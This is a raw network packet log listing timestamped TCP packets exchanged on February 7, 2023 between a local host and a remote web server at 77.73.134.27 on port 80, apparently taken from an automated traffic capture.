                                                                                    Feb 7, 2023 19:44:50.665770054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.665797949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.665811062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.665827036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.665855885 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.665865898 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.665885925 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.665916920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.665929079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.665945053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.665971994 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.665985107 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.665998936 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666028023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666037083 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666057110 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666085958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666098118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666115046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666142941 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666153908 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666171074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666199923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666212082 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666229010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666256905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666271925 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666284084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666312933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666322947 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666340113 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666368008 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666382074 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666397095 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666426897 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666435957 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666455984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666485071 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666496038 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666512966 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666543007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666555882 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666572094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666595936 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666611910 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666623116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666661978 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666707039 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666754007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666781902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666807890 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666830063 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666834116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666857004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666863918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666913986 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.666917086 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666944981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666973114 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.666984081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667001963 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667030096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667056084 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667057991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667085886 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667093039 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667114973 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667143106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667148113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667171955 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667201042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667211056 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667227030 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667253971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667265892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667279959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667304039 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667315006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667391062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667418957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667432070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667448997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667475939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667486906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667505026 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667534113 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667546988 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667562008 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667593002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667603016 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667623043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667653084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667666912 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667680979 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667709112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667723894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667740107 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667767048 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667779922 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667794943 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667823076 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667843103 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667850971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667879105 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667890072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667907953 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667943001 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667957067 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.667969942 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.667999983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668013096 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668028116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668056011 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668071032 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668083906 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668112993 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668126106 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668140888 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668168068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668184042 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668198109 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668225050 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668236971 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668253899 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668294907 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668411016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668440104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668467999 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668483973 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668494940 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668524027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668534994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668551922 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668579102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668593884 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668608904 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668637037 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668648958 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668664932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668693066 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668709993 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668720961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668750048 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668765068 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668777943 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668807983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668819904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668838024 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668867111 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668879986 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668895006 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668924093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668936014 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.668951035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668979883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.668993950 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.669007063 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.669034004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.669049978 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.669061899 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.669090033 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.669101954 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.669117928 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.669146061 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.669157982 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670149088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670181990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670208931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670236111 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670249939 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670264006 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670289993 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670291901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670320034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670346022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670367002 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670373917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670401096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670428991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670454025 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670456886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670478106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670502901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670519114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670528889 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670555115 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670558929 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670582056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670587063 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670608997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670636892 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670644999 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670665026 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670708895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670710087 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670746088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670773983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.670775890 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.670814991 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671349049 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671380043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671405077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671432018 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671449900 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671458960 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671485901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671492100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671514988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671540976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671551943 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671569109 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671586990 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671600103 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671627998 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671641111 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671655893 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671684027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671699047 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671715021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671742916 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671753883 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671771049 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671797991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671809912 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671824932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671866894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671878099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671906948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671931982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671947002 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.671957016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671983957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.671999931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.672010899 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.672038078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.672050953 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.672065020 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.672091961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.672106981 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.673686981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.673721075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.673753977 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.673767090 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.673793077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.673825979 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.673829079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.673857927 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.673885107 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.673885107 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.673916101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.673928976 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.673943996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.673973083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.673981905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.674000978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674027920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674055099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674082041 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674097061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.674118996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674151897 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674166918 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.674190044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674190998 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.674216986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674242020 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.674243927 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674271107 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674297094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674298048 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.674324989 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674351931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674355030 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.674387932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.674401045 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.676770926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.676810026 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.676846027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.676847935 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.676883936 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.676913023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.676924944 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.676940918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.676969051 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.676969051 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.676997900 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677015066 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677026033 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677062988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677063942 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677095890 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677124023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677150011 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677150965 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677181005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677190065 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677213907 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677244902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677248955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677278042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677304029 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677326918 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677330017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677357912 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677373886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677397013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677433968 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677450895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677462101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677489996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677504063 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677517891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677552938 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677567959 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677736044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677783012 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677791119 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677820921 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677850008 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677861929 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677877903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677903891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677917004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677932024 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677959919 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.677983046 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.677985907 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.678020954 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.678033113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.678052902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.678083897 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.678096056 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.678112030 CET804969877.73.134.27192.168.2.3
